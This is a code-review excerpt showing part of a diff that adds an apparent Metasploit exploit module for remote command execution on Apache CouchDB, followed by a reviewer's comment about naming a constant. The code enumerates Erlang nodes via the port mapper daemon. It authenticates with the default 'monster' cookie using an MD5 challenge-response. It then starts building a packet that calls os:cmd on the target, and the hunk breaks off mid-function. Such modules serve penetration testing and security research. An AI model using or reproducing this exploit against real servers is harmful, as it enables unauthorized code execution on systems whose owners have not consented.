modules/exploits/multi/http/apache_couchdb_erlang_rce.rb

```diff
@@ -0,0 +1,256 @@
+  end
+
+  # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers
+  #
+  # @return [Array] An array of port numbers for discovered Erlang Servers.
+  def get_erlang_ports
+    erlang_ports = []
+    begin
+      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")
+      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })
+      # request Erlang nodes
+      sock.put(EPM_NAME_CMD)
+      sleep datastore['WfsDelay']
+      res = sock.get_once
+      unless res && res.include?("\x00\x00\x11\x11name couchdb")
+        print_error('Did not find any Erlang nodes')
+        return erlang_ports
+      end
+
+      print_status('Successfully found EDPM socket')
+      res.each_line do |line|
+        erlang_ports << line.match(/\s(\d+$)/)[0]
+      end
+    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+      print_error("Error connecting to EDPM: #{e.class} #{e}")
+      disconnect
+      return erlang_ports
+    end
+    erlang_ports
+  end
+
+  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the
+  # default erlang cookie value in Apache CouchDB installations before 3.2.2
+  #
+  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server
+  def connect_to_erlang_server(erlang_port)
+    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')
+    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })
+    print_status('Connection successful')
+    sock.put(NAME_MSG)
+    sleep datastore['WfsDelay']
+    sock.get_once(5) # ok message
+    challenge = sock.get_once
+    # The expected successful response from the target should start with \x00\x1C
+    unless challenge && challenge.include?("\x00\x1C")
+      print_error('Connecting to the Erlang server was unsuccessful')
+      return
+    end
+
+    challenge = challenge[9..12].unpack('N*')[0]
+    challenge_reply = "\x00\x15r\x01\x02\x03\x04"
+    md5 = Digest::MD5.new
+    md5.update(COOKIE + challenge.to_s)
+    challenge_reply << [md5.hexdigest].pack('H*')
+    sock.put(challenge_reply)
+    sleep datastore['WfsDelay']
+    challenge_response = sock.get_once
+
+    if challenge_response.nil?
+      print_error('Authentication was unsuccessful')
+      return
+    end
+    print_status('Erlang challenge and response completed successfully')
+
+    sock
+  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
+    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")
+    disconnect
+    return
+  end
+
+  def compile_cmd(cmd)
+    msg = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
```

Comment:
Consider moving this up with the other constants + giving it a name describing what is is/means